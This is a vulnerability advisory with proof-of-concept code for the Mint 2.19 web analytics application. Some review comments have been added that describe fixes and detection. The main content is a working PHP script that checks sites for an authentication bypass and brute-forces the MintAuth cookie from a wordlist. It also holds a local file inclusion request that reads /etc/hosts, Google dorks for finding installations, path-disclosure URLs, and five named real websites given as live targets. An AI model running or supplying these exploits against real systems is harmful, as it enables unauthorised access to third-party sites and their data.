****************************************************************************** # App Name: Mint 2.19 # Google Dork(about 1,630,000 results): "Shaun Inman. All rights reserved." intitle:"Mint: " # Vendor Homepage: www.haveamint.com ******************************************************************************/ 1. Email verification bypass($_COOKIE and $_GET): Vulnerable Code(mint.php): Code: function isLoggedIn() { /* Review: the only credential check is a loose == between the raw cookie value and md5() of the configured password. The cookie is therefore a static, unsalted, password-derived bearer token: it stays valid for as long as the password is unchanged, is not bound to any server-side session, and is compared with == rather than hash_equals(). A server-generated random session id kept server-side and checked with hash_equals() would remove the guessable value entirely. */ return (isset($_COOKIE['MintAuth']) && $_COOKIE['MintAuth']==md5($this->cfg['password']))?true:false; } POC: Code: <?php /* Advisory PoC as published; reproduced unchanged, comments only. */ function TestError($host, $path) { /* Sends one GET for ?preferences with no cookie at all and reports the host as vulnerable if the "Mint: Preferences" title shows up in the first 16 response lines. Detection angle: a request for ?preferences carrying no MintAuth cookie that is nonetheless answered with the preferences page. */ $data = "GET ".$path."?preferences HTTP/1.0\r\n". "Host: ".$host."\r\n". // "UserAgent: Opera/9.60 (Windows NT 5.1; U; en) Presto/2.1.1\r\n". // "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, */*;q=0.1\r\n". "Connection: close\r\n\r\n"; $socket = fsockopen($host, 80); fputs($socket, $data); $result = "is NOT vulnerable"; for($i=0;$i<16;$i++) if (strpos(fgets($socket), "Mint: Preferences")!=0) $result = "is VULNERABLE"; fclose($socket); echo "http://".$host.$path." - ".$result."\n"; return ($result=="is VULNERABLE")?true:false; } function Auth($pass, $host, $path) { /* Sends md5() of one candidate password as the MintAuth cookie and treats the preferences page title as success. Because isLoggedIn() compares against a fixed md5(password) value, nothing server-side bounds the number of attempts; each attempt is a separate GET to ?preferences with a different MintAuth value, which is the pattern a rate limit or log alert should key on. */ $passhash = md5($pass); $data = "GET ".$path."?preferences HTTP/1.0\r\n". "Host: ".$host."\r\n". // "UserAgent: Opera/9.60 (Windows NT 5.1; U; en) Presto/2.1.1\r\n". // "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, */*;q=0.1\r\n". "Cookie: MintAuth=".$passhash.";\r\n". "Connection: close\r\n\r\n"; $socket = fsockopen($host, 80); fputs($socket, $data); $result = "BAD"; for($i=0;$i<16;$i++) if (strpos(fgets($socket), "Mint: Preferences")!=0) $result = "GOOD"; fclose($socket); echo $pass." 
= ".$result."\n"; return ($result=="GOOD")?true:false; } switch($argv[1]) { /* CLI dispatch: -check calls TestError() once; -bruteforce reads a wordlist one line at a time (CR/LF stripped) and calls Auth() per line, stopping at the first success; anything else prints usage. */ case "-check": $host = $argv[2]; $path = $argv[3]; TestError($host, $path); break; case "-bruteforce": $host = $argv[2]; $path = $argv[3]; $passlist = $argv[4]; $file = fopen($passlist, "r"); if ($file!=NULL) { while (!feof($file)) { $current_password = str_replace("\r", '', (str_replace("\n", '', fgets($file)))); if (Auth($current_password, $host, $path)==true) { echo ">>>>>bruteforce SUCCESSFUL!!! (password=".$current_password.")\n"; exit(); } } fclose($file); echo ">>>>>bruteforce UNsuccessful :(\n"; } else echo "ERROR: ".$passlist." not found!\n"; break; default: echo "##### Mint 2.19 email verification bypass\n"; echo "##### Author: Unlog\n"; echo "##### Usage:\n". "\tmint.php -check www.example.com /mint/\n". "\tmint.php -bruteforce www.example.com /mint/ passlist.txt\n"; } ?> Additional Information: Same vulnerability in authenticateRSS function Vulnerable Code(mint.php): Code: function authenticateRSS() { /* Same flaw as isLoggedIn(), but here the md5(password) value arrives in the query string ($_GET['RSS']): besides being a static password-equivalent token, it is likely to be recorded in web-server, proxy and Referer logs. */ return (isset($_GET['RSS']) && $_GET['RSS'] == md5($this->cfg['password']))?true:false; } POC: Same as above(with some modifications) 2. _Fatal error_ authentification bupass: Info: If there is some fatal error like _mysql server down_, no authentification is needed to access preferences Vulnerable Code(path.php): Code: if ($Mint->errors['fatal']) { /* When a fatal error is flagged (the advisory's example is the database being unreachable) the error page is included and execution stops right here, apparently before the authentication path is ever reached, which is why the advisory reports ?preferences being served without a login in that state. The error handler should run after, or independently of, the auth check. */ include(MINT_ROOT.'app/paths/errors/index.php'); exit(); } Google Dork: "Mint was unable to connect" intitle:"Mint:" POC: Code: http://mint.ryanmccuaig.net/?preferences http://www.stunda.nl/mint/?preferences http://dejurka.ru/mint/?preferences http://www.mad4milk.net/mint/?preferences http://www.andrewgill.co.za/mint/?preferences 3. LFI in mint.php Info: LFI Requies access to preferences(can be obtained by using first or second exploit) Vulnerable Code: Code: mint.php: function installPepper($pathToPepper) { /* The include path is MINT_ROOT concatenated with a caller-supplied string, with no normalisation and no allow-list; the preferences handler passes $_POST['src'] straight in, so nothing stops the value from resolving outside the pepper directory (the advisory's LFI). A fix would canonicalise the path and require it to stay inside the expected directory before including it. */ include_once(MINT_ROOT.$pathToPepper); ... 
\app\paths\preferences\index.php: if (isset($_POST['MintPath']) && $_POST['MintPath'] == 'Preferences') ... switch($_POST['action']) ... case 'Install Pepper': $Mint->tmp['pageTitle'] = 'Install Pepper'; $Mint->installPepper($_POST['src']); POC: Code: POST http://***/ HTTP/1.0 Host: ***.com UserAgent: Opera/9.60 (Windows NT 5.1; U; en) Presto/2.1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, */*;q=0.1 Connection: Close Content-Type: application/x-www-form-urlencoded Content-length: 58 MintPath=Preferences&action=Install Pepper&src=/etc/hosts& 4. Multiple Full Path Disclosure Vulnerable Code: Code: if (!defined('MINT')) { header('Location:/'); }; // Prevent viewing this file POC: Code: GET http://localhost/mint/app/includes/foot.php?benchmark GET http://localhost/mint/app/includes/foot.php?observe GET http://localhost/mint/app/paths/auth/index.php GET http://localhost/mint/app/paths/custom/index.php?custom GET http://localhost/mint/app/paths/custom/index.php?RSS GET http://localhost/mint/app/paths/display/display.php GET http://localhost/mint/app/paths/display/index.php?tab GET http://localhost/mint/app/paths/errors/index.php GET http://localhost/mint/app/paths/feedback/index.php GET http://localhost/mint/app/paths/install/configuration.php GET http://localhost/mint/app/paths/install/instructions.php POST http://localhost/mint/app/paths/install/index.php | action=Activate POST http://localhost/mint/app/paths/install/index.php | action=Accept POST http://localhost/mint/app/paths/install/index.php | action=Configure and etc